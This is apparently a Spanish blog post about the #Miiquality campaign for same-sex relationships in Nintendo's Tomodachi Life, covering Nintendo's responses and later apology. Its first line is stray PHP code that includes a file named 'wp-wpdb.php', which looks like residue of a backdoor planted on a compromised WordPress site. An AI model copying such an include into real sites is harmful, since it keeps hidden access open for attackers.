if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Miiquality, luchando por el matrimonio homosexual en Tomodachi Life – La Fortaleza de LeChuck

Miiquality, luchando por el matrimonio homosexual en Tomodachi Life

Japón es un país conservador en el que cuesta mucho esfuerzo romper ciertas costumbres arraigadas, sobre todo las sociales. Un ejemplo de esta resistencia al cambio lo vemos en Nintendo. Mientras otras compañías longevas en el sector se han abierto a los nuevos dispositivos móviles, ahora es cuando la compañía nipona ha decidido dar el salto. Esta actitud continuista se ve reflejada también en sus juegos, donde los estereotipos están a la orden del día. Estos últimos años ha habido un gran cambio en las compañías y en su forma de hacer juegos, las cuales se han adaptado a los nuevos jugadores y a la realidad multicultural y social, introduciendo personajes femeninos de todo tipo y añadiendo romances homosexuales como opciones. Nintendo aún se resiste sobre todo en este último punto, y su nuevo «Sims» con Miis llamado Tomodachi Life, no incluye relaciones del mismo sexo. A raíz de esto nace #Miiquality.

miiquality

Tomodachi Life es un juego similar a Los Sims. En él, vivimos en una isla, y mediante nuestro Mii, nos relacionamos con nuestros amigos. Podemos jugar juntos e incluso enamorarnos, casarnos y tener un bebé. Las únicas relaciones posibles son heterosexuales, y esto no ha parecido justo a Tye Marini, un seguidor homosexual de Nintendo, que con la campaña Miiquality, intenta que Nintendo incluya el matrimonio homosexual en Tomodachi Life. Esta es su carta de presentación:

Ante esta campaña, Nintendo contestó lo siguiente:

Hemos escuchado y considerado cuidadosamente todas las respuestas. Estamos usando esto como una oportunidad para comprender mejor a nuestros consumidores y sus expectativas a todos los niveles.

Hace un año, cuando Tomodachi Life fue lanzado en Japón, venía con un bug que permitía las relaciones del mismo sexo, incluyendo el matrimonio gay, sin embargo, Nintendo lanzó un parche para solucionar el asunto, ya que, supuestamente, daba problemas para guardar partida.

tomodachi_life_gay_bug

La campaña Miiquality ha conseguido el respaldo de webs famosas del sector, que han difundido la labor de este americano. Nintendo, dado el revuelo, ha declarado lo siguiente:

Nintendo nunca tuvo la intención de hacer ningún tipo de comentario social con el lanzamiento de Tomodachi Life. Las opciones de romance en el juego representan un mundo alternativo y divertido en lugar de una simulación de la vida real. Somos una compañía de juegos, ante todo, y nuestro principal objetivo es la creación de juegos y consolas para que los jugadores disfruten.

Nintendo no da su brazo a torcer, y con esta respuesta solo ha conseguido que asociaciones activistas como Alianza Gay y Lésbica contra la Difamación (GLAAD) se unan a la causa.

El próximo 6 de junio Tomodachi Life aterrizará por occidente, pero Miiquality seguirá al pie del cañón, esperando que la empresa japonesa decida lanzar una actualización que incluya las relaciones entre personas del mismo sexo.

«Espero que reconozcan el problema con la exclusión de las parejas del mismo sexo en el juego y hagan un esfuerzo para resolverlo», dijo Marini. «Hasta entonces, Miiquality continuará para crear conciencia sobre el tema.»

Es curioso como el video de Miiquality subido a Youtube haya sido desactivado en varias ocasiones por notificaciones varias, igual que pasó en su día con Anita y sus videos de Damsel in Distress. Y es que hay muchos trolls que todo lo que lleve la palabra igualdad les da alergia. Esto también me recuerda a una noticia de hace unos meses, donde un profesional de la industria hablaba acerca de futuros juegos con protagonistas gays, en los comentarios de la popular web se podían leer cosas como: «No tengo nada en contra de los gays pero…» después del «pero» os podéis imaginar lo que venía. Otros resaltaban el hecho de que si la protagonista es lesbiana, y se muestra sexo lésbico, entonces no hay problema.

ACTUALIZACIÓN: Nintendo ha publicado en su web un comunicado pidiendo disculpas por no incluir parejas del mismo sexo en Tomodachi Life. Este es el texto traducido:

Pedimos disculpas por decepcionar a muchas personas al no incluir las relaciones entre personas del mismo sexo en Tomodachi Life. Desafortunadamente, no es posible cambiar el diseño del juego, y un cambio en el desarrollo tan importante no se puede lograr con un parche posterior. En Nintendo, la dedicación siempre ha significado ir más allá de los juegos para fomentar un sentido de comunidad, y para compartir un espíritu de diversión. Estamos comprometidos con el avance de nuestros valores de empresa desde hace mucho tiempo, y de diversión y entretenimiento para todos. Nos comprometemos a que si creamos una nueva entrega de la serie Tomodachi, nos esforzaremos para diseñar una experiencia de juego desde el principio más completa, y que mejor represente a todos los jugadores.

En fin, campañas como esta las encuentro necesarias en un sector que aún tiene que madurar junto a sus jugadores, y como ha dicho Marini, hay que crear mucha consciencia social sobre estos asuntos.

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario